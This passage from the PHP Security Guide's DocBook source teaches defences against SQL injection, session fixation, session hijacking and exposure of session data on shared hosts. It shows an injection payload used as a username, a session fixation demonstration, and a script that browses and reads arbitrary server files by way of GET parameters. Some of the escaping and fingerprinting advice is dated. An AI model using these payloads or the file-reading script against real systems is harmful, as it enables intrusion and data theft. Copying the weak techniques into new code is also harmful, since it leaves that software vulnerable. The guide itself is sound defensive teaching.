if your modules consist of only variable assignments (as an example), this
particular risk is mitigated.</para>
<para>My favorite method for protecting your database access credentials is
described in the PHP Cookbook (O'Reilly) by David Sklar and Adam Trachtenberg.
Create a file, <literal>/path/to/secret-stuff</literal>, that only
<literal>root</literal> can read (not <literal>nobody</literal>):</para>
<programlisting>
<![CDATA[SetEnv DB_USER "myuser"
SetEnv DB_PASS "mypass"]]>
</programlisting>
<para>Include this file within <literal>httpd.conf</literal> as
follows:</para>
<programlisting>
<![CDATA[Include "/path/to/secret-stuff"]]>
</programlisting>
<para>Now you can use <literal>$_SERVER['DB_USER']</literal> and
<literal>$_SERVER['DB_PASS']</literal> in your code. Not only do you never
have to write your username and password in any of your scripts, the web
server can't read the <literal>secret-stuff</literal> file, so no other users
can write scripts to read your access credentials (regardless of language).
Just be careful not to expose these variables with something like
<literal>phpinfo()</literal> or <literal>print_r($_SERVER)</literal>.</para>
</sect1>

<sect1 id="SQL-INJECTION">
<title>SQL Injection</title>
<para>SQL injection attacks are extremely simple to defend against, but many
applications are still vulnerable. Consider the following SQL
statement:</para>
<programlisting>
<![CDATA[<?php

$sql = "INSERT
        INTO   users (reg_username,
                      reg_password,
                      reg_email)
        VALUES ('{$_POST['reg_username']}',
                '$reg_password',
                '{$_POST['reg_email']}')";

?>]]>
</programlisting>
<para>This query is constructed with <literal>$_POST</literal>, which should
immediately look suspicious.</para>
<para>Assume that this query is creating a new account. The user provides a
desired username and an email address. The registration application generates
a temporary password and emails it to the user to verify the email address.
Imagine that the user enters the following as a username:</para>
<programlisting>
<![CDATA[bad_guy', 'mypass', ''), ('good_guy]]>
</programlisting>
<para>This certainly doesn't look like a valid username, but with no data
filtering in place, the application can't tell. If a valid email address is
given (<literal>shiflett@php.net</literal>, for example), and
<literal>1234</literal> is what the application generates for the password,
the SQL statement becomes the following:</para>
<programlisting>
<![CDATA[
<?php

$sql = "INSERT
        INTO   users (reg_username,
                      reg_password,
                      reg_email)
        VALUES ('bad_guy', 'mypass', ''), ('good_guy',
                '1234',
                'shiflett@php.net')"; ?>
]]>
</programlisting>
<para>Rather than the intended action of creating a single account
(<literal>good_guy</literal>) with a valid email address, the application has
been tricked into creating two accounts, and the user supplied every detail of
the <literal>bad_guy</literal> account.</para>
<para>While this particular example might not seem so harmful, it should be
clear that worse things could happen once an attacker can make modifications
to your SQL statements.</para>
<para>For example, depending on the database you are using, it might be
possible to send multiple queries to the database server in a single call.
Thus, a user can potentially terminate the existing query with a semicolon and
follow this with a query of the user's choosing.</para>
<para>MySQL, until recently, does not allow multiple queries, so this
particular risk is mitigated. Newer versions of MySQL allow multiple queries,
but the corresponding PHP extension (<literal>ext/mysqli</literal>) requires
that you use a separate function if you want to send multiple queries
(<literal>mysqli_multi_query()</literal> instead of
<literal>mysqli_query()</literal>). Only allowing a single query is safer,
because it limits what an attacker can potentially do.</para>
<para>Protecting against SQL injection is easy:</para>
<itemizedlist>
    <listitem>
        <para>Filter your data.</para>
        <para>This cannot be overstressed. With good data filtering in place,
        most security concerns are mitigated, and some are practically
        eliminated.</para>
    </listitem>
    <listitem>
        <para>Quote your data.</para>
        <para>If your database allows it (MySQL does), put single quotes
        around all values in your SQL statements, regardless of the data
        type.</para>
    </listitem>
    <listitem>
        <para>Escape your data.</para>
        <para>Sometimes valid data can unintentionally interfere with the
        format of the SQL statement itself. Use
        <literal>mysql_escape_string()</literal> or an escaping function
        native to your particular database. If there isn't a specific one,
        <literal>addslashes()</literal> is a good last resort.</para>
    </listitem>
</itemizedlist>
</sect1>
</chapter>

<chapter id="SESSIONS">
<title>Sessions</title>

<sect1 id="SESSION-FIXATION">
<title>Session Fixation</title>
<para>Session security is a sophisticated topic, and it's no surprise that
sessions are a frequent target of attack. Most session attacks involve
impersonation, where the attacker attempts to gain access to another user's
session by posing as that user.</para>
<para>The most crucial piece of information for an attacker is the session
identifier, because this is required for any impersonation attack. There are
three common methods used to obtain a valid session identifier:</para>
<itemizedlist>
    <listitem><para>Prediction</para></listitem>
    <listitem><para>Capture</para></listitem>
    <listitem><para>Fixation</para></listitem>
</itemizedlist>
<para>Prediction refers to guessing a valid session identifier. With PHP's
native session mechanism, the session identifier is extremely random, and this
is unlikely to be the weakest point in your implementation.</para>
<para>Capturing a valid session identifier is the most common type of session
attack, and there are numerous approaches. Because session identifiers are
typically propagated in cookies or as <literal>GET</literal> variables, the
different approaches focus on attacking these methods of transfer. While there
have been a few browser vulnerabilities regarding cookies, these have mostly
been Internet Explorer, and cookies are slightly less exposed than GET
variables. Thus, for those users who enable cookies, you can provide them with
a more secure mechanism by using a cookie to propagate the session
identifier.</para>
<para>Fixation is the simplest method of obtaining a valid session identifier.
While it's not very difficult to defend against, if your session mechanism
consists of nothing more than <literal>session_start()</literal>, you are
vulnerable.</para>
<para>In order to demonstrate session fixation, I will use the following
script, <literal>session.php</literal>:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (!isset($_SESSION['visits']))
{
    $_SESSION['visits'] = 1;
}
else
{
    $_SESSION['visits']++;
}

echo $_SESSION['visits'];

?>]]>
</programlisting>
<para>Upon first visiting the page, you should see <literal>1</literal> output
to the screen. On each subsequent visit, this should increment to reflect how
many times you have visited the page.</para>
<para>To demonstrate session fixation, first make sure that you do not have an
existing session identifier (perhaps delete your cookies), then visit this
page with <literal>?PHPSESSID=1234</literal> appended to the URL. Next, with a
completely different browser (or even a completely different computer), visit
the same URL again with <literal>?PHPSESSID=1234</literal> appended. You will
notice that you do not see <literal>1</literal> output on your first visit,
but rather it continues the session you previously initiated.</para>
<para>Why can this be problematic? Most session fixation attacks simply use a
link or a protocol-level redirect to send a user to a remote site with a
session identifier appended to the URL. The user likely won't notice, since
the site will behave exactly the same. Because the attacker chose the session
identifier, it is already known, and this can be used to launch impersonation
attacks such as session hijacking.</para>
<para>A simplistic attack such as this is quite easy to prevent. If there
isn't an active session associated with a session identifier that the user is
presenting, then regenerate it just to be sure:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (!isset($_SESSION['initiated']))
{
    session_regenerate_id();
    $_SESSION['initiated'] = true;
}

?>]]>
</programlisting>
<para>The problem with such a simplistic defense is that an attacker can
simply initialize a session for a particular session identifier, and then use
that identifier to launch the attack.</para>
<para>To protect against this type of attack, first consider that session
hijacking is only really useful after the user has logged in or otherwise
obtained a heightened level of privilege. So, if we modify the approach to
regenerate the session identifier whenever there is any change in privilege
level (for example, after verifying a username and password), we will have
practically eliminated the risk of a successful session fixation
attack.</para>
</sect1>

<sect1 id="SESSION-HIJACKING">
<title>Session Hijacking</title>
<para>Arguably the most common session attack, session hijacking refers to all
attacks that attempt to gain access to another user's session.</para>
<para>As with session fixation, if your session mechanism only consists of
<literal>session_start()</literal>, you are vulnerable, although the exploit
isn't as simple.</para>
<para>Rather than focusing on how to keep the session identifier from being
captured, I am going to focus on how to make such a capture less problematic.
The goal is to complicate impersonation, since every complication increases
security. To do this, we will examine the steps necessary to successfully
hijack a session. In each scenario, we will assume that the session identifier
has been compromised.</para>
<para>With the most simplistic session mechanism, a valid session identifier
is all that is needed to successfully hijack a session. In order to improve
this, we need to see if there is anything extra in an HTTP request that we can
use for extra identification.</para>
<note><para>It is unwise to rely on anything at the TCP/IP level, such as IP
address, because these are lower level protocols that are not intended to
accommodate activities taking place at the HTTP level. A single user can
potentially have a different IP address for each request, and multiple users
can potentially have the same IP address.</para></note>
<para>Recall a typical HTTP request:</para>
<programlisting>
<![CDATA[GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234]]>
</programlisting>
<para>Only the <literal>Host</literal> header is required by
<literal>HTTP/1.1</literal>, so it seems unwise to rely on anything else.
However, consistency is really all we need, because we're only interested in
complicating impersonation without adversely affecting legitimate
users.</para>
<para>Imagine that the previous request is followed by a request with a
different <literal>User-Agent</literal>:</para>
<programlisting>
<![CDATA[GET / HTTP/1.1
Host: example.org
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=1234]]>
</programlisting>
<para>Although the same cookie is presented, should it be assumed that this is
the same user? It seems highly unlikely that a browser would change the
<literal>User-Agent</literal> header between requests, right? Let's modify the
session mechanism to perform an extra check:</para>
<programlisting>
<![CDATA[<?php

session_start();

if (isset($_SESSION['HTTP_USER_AGENT']))
{
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
    {
        /* Prompt for password */
        exit;
    }
}
else
{
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}

?>]]>
</programlisting>
<para>Now an attacker must not only present a valid session identifier, but
also the correct <literal>User-Agent</literal> header that is associated with
the session. This complicates things slightly, and it is therefore a bit more
secure.</para>
<para>Can we improve this? Consider that the most common method used to obtain
cookie values is by exploiting a vulnerable browser such as Internet Explorer.
These exploits involve the victim visiting the attacker's site, so the
attacker will be able to obtain the correct <literal>User-Agent</literal>
header. Something additional is necessary to protect against this
situation.</para>
<para>Imagine if we required the user to pass the MD5 of the
<literal>User-Agent</literal> in each request. An attacker could no longer
just recreate the headers that the victim's requests contain, but it would
also be necessary to pass this extra bit of information. While guessing the
construction of this particular token isn't too difficult, we can complicate
such guesswork by simply adding an extra bit of randomness to the way we
construct the token:</para>
<programlisting>
<![CDATA[<?php

$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';

/* Add any other data that is consistent */

$fingerprint = md5($string);

?>]]>
</programlisting>
<para>Keeping in mind that we're passing the session identifier in a cookie,
and this already requires that an attack be used to compromise this cookie
(and likely all HTTP headers as well), we should pass this fingerprint as a
URL variable. This must be in all URLs as if it were the session identifier,
because both should be required in order for a session to be automatically
continued (in addition to all checks passing).</para>
<para>In order to make sure that legitimate users aren't treated like
criminals, simply prompt for a password if a check fails. If there is an error
in your mechanism that incorrectly suspects a user of an impersonation attack,
prompting for a password before continuing is the least offensive way to
handle the situation. In fact, your users may appreciate the extra bit of
protection perceived from such a query.</para>
<para>There are many different methods you can use to complicate impersonation
and protect your applications from session hijacking. Hopefully you will at
least do something in addition to <literal>session_start()</literal> as well
as be able to come up with a few ideas of your own. Just remember to make
things difficult for the bad guys and easy for the good guys.</para>
<note><para>Some experts claim that the <literal>User-Agent</literal> header
is not consistent enough to be used in the way described. The argument is that
an HTTP proxy in a cluster can modify the <literal>User-Agent</literal> header
inconsistently with other proxies in the same cluster. While I have never
observed this myself (and feel comfortable relying on the consistency of
<literal>User-Agent</literal>), it is something you may want to
consider.</para>
<para>The <literal>Accept</literal> header has been known to change from
request to request in Internet Explorer (depending on whether the user
refreshes the browser), so this should not be relied upon for
consistency.</para></note>
</sect1>
</chapter>

<chapter id="SHARED-HOSTS">
<title>Shared Hosts</title>

<sect1 id="EXPOSED-SESSION-DATA">
<title>Exposed Session Data</title>
<para>When on a shared host, security simply isn't going to be as strong as
when on a dedicated host. This is one of the tradeoffs for the inexpensive
fee.</para>
<para>One particularly vulnerable aspect of shared hosting is having a shared
session store. By default, PHP stores session data in <literal>/tmp</literal>,
and this is true for everyone. You will find that most people stick with the
default behavior for many things, and sessions are no exception. Luckily, not
just anyone can read session files, because they are only readable by the web
server:</para>
<programlisting>
<![CDATA[$ ls /tmp
total 12
-rw-------  1  nobody  nobody  123 May 21 12:34 sess_dc8417803c0f12c5b2e39477dc371462
-rw-------  1  nobody  nobody  123 May 21 12:34 sess_46c83b9ae5e506b8ceb6c37dc9a3f66e
-rw-------  1  nobody  nobody  123 May 21 12:34 sess_9c57839c6c7a6ebd1cb45f7569d1ccfc
$]]>
</programlisting>
<para>Unfortunately, it is pretty trivial to write a PHP script to read these
files, and because it runs as the user <literal>nobody</literal> (or whatever
user the web server uses), it has the necessary privileges.</para>
<para>The <literal>safe_mode</literal> directive can prevent this and similar
safety concerns, but since it only applies to PHP, it doesn't address the
root cause of the problem. Attackers can simply use other languages.</para>
<para>What's a better solution? Don't use the same session store as everyone
else. Preferably, store them in a database where the access credentials are
unique to your account. To do this, simply use the
<literal>session_set_save_handler()</literal> function to override PHP's
default session handling with your own PHP functions.</para>
<para>The following code shows a simplistic example for storing sessions in a
database:</para>
<programlisting>
<![CDATA[<?php

session_set_save_handler('_open',
                         '_close',
                         '_read',
                         '_write',
                         '_destroy',
                         '_clean');

function _open()
{
  global $_sess_db;

  $db_user = $_SERVER['DB_USER'];
  $db_pass = $_SERVER['DB_PASS'];
  $db_host = 'localhost';
    
  if ($_sess_db = mysql_connect($db_host, $db_user, $db_pass))
  {
    return mysql_select_db('sessions', $_sess_db);
  }
    
  return FALSE;
}

function _close()
{
  global $_sess_db;
    
  return mysql_close($_sess_db);
}

function _read($id)
{
  global $_sess_db;

  $id = mysql_real_escape_string($id);

  $sql = "SELECT data
          FROM   sessions
          WHERE  id = '$id'";

  if ($result = mysql_query($sql, $_sess_db))
  {
    if (mysql_num_rows($result))
    {
      $record = mysql_fetch_assoc($result);

      return $record['data'];
    }
  }

  return '';
}

function _write($id, $data)
{   
  global $_sess_db;

  $access = time();

  $id = mysql_real_escape_string($id);
  $access = mysql_real_escape_string($access);
  $data = mysql_real_escape_string($data);

  $sql = "REPLACE 
          INTO    sessions
          VALUES  ('$id', '$access', '$data')";

  return mysql_query($sql, $_sess_db);
}

function _destroy($id)
{
  global $_sess_db;
    
  $id = mysql_real_escape_string($id);

  $sql = "DELETE
          FROM   sessions
          WHERE id = '$id'";

  return mysql_query($sql, $_sess_db);
}

function _clean($max)
{
  global $_sess_db;
    
  $old = time() - $max;
  $old = mysql_real_escape_string($old);

  $sql = "DELETE
          FROM   sessions
          WHERE  access < '$old'";

  return mysql_query($sql, $_sess_db);
}

?>]]>
</programlisting>
<para>This requires an existing table named <literal>sessions</literal>, whose
format is as follows:</para>
<programlisting>
<![CDATA[mysql> DESCRIBE sessions;
+--------+------------------+------+-----+---------+-------+
| Field  | Type             | Null | Key | Default | Extra |
+--------+------------------+------+-----+---------+-------+
| id     | varchar(32)      |      | PRI |         |       |
| access | int(10) unsigned | YES  |     | NULL    |       |
| data   | text             | YES  |     | NULL    |       |
+--------+------------------+------+-----+---------+-------+]]>
</programlisting>
<para>This database can be created in MySQL with the following syntax:</para>
<programlisting>
<![CDATA[CREATE TABLE sessions
(
    id varchar(32) NOT NULL,
    access int(10) unsigned,
    data text,
    PRIMARY KEY (id)
);]]>
</programlisting>
<para>Storing your sessions in a database places the trust in the security of
your database. Recall the lessons learned when we spoke about databases and
SQL, because they are applicable here.</para>
</sect1>

<sect1 id="BROWSING-THE-FILESYSTEM">
<title>Browsing the Filesystem</title>
<para>Just for fun, let's look at a script that browses the filesystem:</para>
<programlisting>
<![CDATA[<?php

echo "<pre>\n";

if (ini_get('safe_mode'))
{
    echo "[safe_mode enabled]\n\n";
}
else
{
    echo "[safe_mode disabled]\n\n";
}

if (isset($_GET['dir']))
{
    ls($_GET['dir']);
}
elseif (isset($_GET['file']))
{
    cat($_GET['file']);
}
else
{
    ls('/');
}

echo "</pre>\n";

function ls($dir)
{
    $handle = dir($dir);

    while ($filename = $handle->read())
    {
        $size = filesize("$dir$filename");

        if (is_dir("$dir$filename"))
        {
            if (is_readable("$dir$filename"))
            {
                $line = str_pad($size, 15);
                $line .= "<a href=\"{$_SERVER['PHP_SE LF']}?dir=$dir$filename/\">$filename/</a>";
            }
            else
            {
                $line = str_pad($size, 15);
                $line .= "$filename/";
            }
        }
        else
        {
            if (is_readable("$dir$filename"))
            {
                $line = str_pad($size, 15);
                $line .= "<a href=\"{$_SERVER['PHP_SELF']}?file=$dir$filename\">$filename</a>";
            }
            else
            {
                $line = str_pad($size, 15);
                $line .= $filename;
            }
        }

        echo "$line\n";
    }

    $handle->close();
}

function cat($file)
{
    ob_start();
    readfile($file);
    $contents = ob_get_contents();
    ob_clean();
    echo htmlentities($contents);

    return true;
}

?>]]>
</programlisting>
<para>The <literal>safe_mode</literal> directive can prevent this particular
script, but what about one written in another language?</para>
<para>A good solution is to store sensitive data in a database and use the
technique mentioned earlier (where <literal>$_SERVER['DB_USER']</literal> and
<literal>$_SERVER['DB_PASS']</literal> contain the access credentials) to
protect your database access credentials.</para>
<para>The best solution is to use a dedicated host.</para>
</sect1>
</chapter>

<chapter id="ABOUT">
<title>About</title>

<sect1 id="ABOUT-THIS-GUIDE">
<title>About This Guide</title>
<para>The PHP Security Guide is a project of the PHP Security Consortium. You
can always find the latest version of the Guide at
<systemitem role="url">http://phpsec.org/projects/guide/</systemitem>.</para>
</sect1>

<sect1 id="ABOUT-THE-PHP-SECURITY-CONSORTIUM">
<title>About the PHP Security Consortium</title>
<para>The mission of the PHP Security Consortium (PHPSC) is to promote secure
programming practices within the PHP community through education and exposition
while maintaining high ethical standards.</para>
<para>Learn more about the Consortium at
<systemitem role="url">http://phpsec.org/</systemitem>.</para>
</sect1>

<sect1 id="MORE-INFORMATION">
<title>More Information</title>
<para>For more information on PHP security practices, visit the PHP Security
Consortium Library at
<systemitem role="url">http://phpsec.org/library/</systemitem>.</para>
</sect1>
</chapter>
</book>
